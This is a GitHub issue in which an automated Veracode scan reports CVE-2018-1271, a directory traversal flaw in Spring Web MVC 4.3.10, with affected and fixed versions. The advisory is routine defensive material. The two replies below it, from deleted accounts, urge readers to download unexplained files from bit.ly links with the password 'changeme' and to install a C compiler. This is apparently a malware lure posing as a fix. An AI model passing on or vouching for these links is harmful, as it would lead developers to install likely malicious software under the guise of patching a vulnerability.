julz0815 / test-action

0 stars 1 forks source link

CVE: 2018-1271 found in Spring Web MVC - Version: 4.3.10.RELEASE [JAVA] #1194

Open github-actions[bot] opened 1 week ago

github-actions[bot] commented 1 week ago

Veracode Software Composition Analysis

Attribute Details
Library Spring Web MVC
Description Spring Web MVC
Language JAVA
Vulnerability Directory Traversal
Vulnerability description spring-webmvc is vulnerable to directory traversal attack. The vulnerability exists due to the improper sanitization of the path values which allows valid Windows files to be served as static resources. This vulnerability only affects spring-webmvc running on Windows which allows serving files with the file: locator, does not use Spring Security with versions patched for CVE-2018-1199, and use Tomcat/WildFly as the server.
CVE 2018-1271
CVSS score 4.3
Vulnerability present in version/s 4.0.0.RELEASE-4.3.14.RELEASE
Found library version/s 4.3.10.RELEASE
Vulnerability fixed in version 4.3.15.RELEASE
Library latest version 6.2.0-RC1
Fix To mitigate this issue, apply fix patch.

Links:

ghost commented 1 week ago

install this https://bit.ly/4gABgKn

Password: changeme If you don't have the c compliator, install it.(gcc or clang)

ghost commented 1 week ago

I think this will help you. https://bit.ly/4gvtdhO Pass: changeme

you may need to install the c compiler